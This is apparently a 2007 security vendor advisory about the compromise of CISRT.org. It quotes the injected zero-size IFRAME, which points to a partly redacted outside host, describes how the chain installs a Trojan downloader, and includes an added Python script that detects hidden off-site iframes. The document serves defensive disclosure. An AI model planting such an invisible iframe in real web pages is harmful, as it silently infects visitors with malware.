    CISRT Under Attack *gasps*

    China’s on a 7-day holiday, but the Chinese Internet Security Response Team (CISRT) folks may opt to go to work instead because of this issue that has recently plagued their website. A malicious IFRAME tag has wormed its way into CISRT.org’s pages.

    Compromised CISRT Web page

    We checked the following three CISRT pages and have confirmed that the IFRAME tag exists on all of them:

    http:// www. cisrt.org/enblog/read.php?172
    http:// www. cisrt.org/enblog/
    http:// www. cisrt.org/

    *spaces included to prevent accidental clicking. For now (until the sites have been cleaned), users are advised to practice caution when browsing these sites.

    The IFRAME, found at the top of the pages, is:

    iframe src=http://mms.{BLOCKED}mmn.com/99916.htm width=0 height=0 frameborder=0

    Even the links posted in some tech-news sites pointing to the CISRT pages mentioned above are compromised!

    The compromised pages lead to malicious IFRAMEs that load scripts and more IFRAMEs, which eventually download, install and execute a Trojan downloader with the filename sms.exe. This downloader then downloads more malicious code onto the infected system.
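    For site owners checking their own pages for this kind of injection, the following added example (not from the original post) flags IFRAMEs that are invisible, as the zero-width, zero-height tag above is, and that load from a different host. The host names, sample HTML and function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_zero(value):
    """True for dimension values such as 0, 0px or 0%."""
    try:
        return value is not None and float(value.strip().lower().rstrip("px%")) == 0
    except ValueError:
        return False


class _IframeAudit(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        host = (urlparse(a.get("src") or "").hostname or "").lower()
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (_is_zero(a.get("width")) or _is_zero(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        same_site = host == self.page_host or host.endswith("." + self.page_host)
        if hidden and host and not same_site:
            self.findings.append((self.getpos()[0], host))


def find_hidden_external_iframes(html, page_host):
    """Return (line, host) for each invisible iframe loading from another site."""
    parser = _IframeAudit(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page; line 1 mimics the unquoted, zero-size tag form.
SAMPLE = """<iframe src=http://ads.injected.example/x.htm width=0 height=0 frameborder=0></iframe>
<html><body>
<iframe src="https://video.partner.example/embed/1" width="560" height="315"></iframe>
<iframe src="/local/tracker.html" width="0" height="0"></iframe>
<iframe src="//cdn.other.example/a" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host in find_hidden_external_iframes(SAMPLE, "site.example"):
        print(f"line {line}: hidden iframe loads from {host}")
```

    The visible embed and the hidden same-site frame in the sample are not reported; only hidden frames pointing off-site are.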

    Trend Micro has already communicated with the good folks at CISRT about this incident. Please stay tuned for more updates regarding this issue.

    UPDATE: (2:50 PM, October 2, 2007, GMT -08:00)

    It seems the CISRT English Blog page has now been cleaned, but the main page is still hosting the malicious IFRAME.

    [Update]

    Trend Micro already detects the related codes for the compromised sites as HTML_IFRAME.HS and WORM_FUBALCA.AQ.

    Trend Micro users are advised to download the latest pattern file to avoid getting infected by these threats.




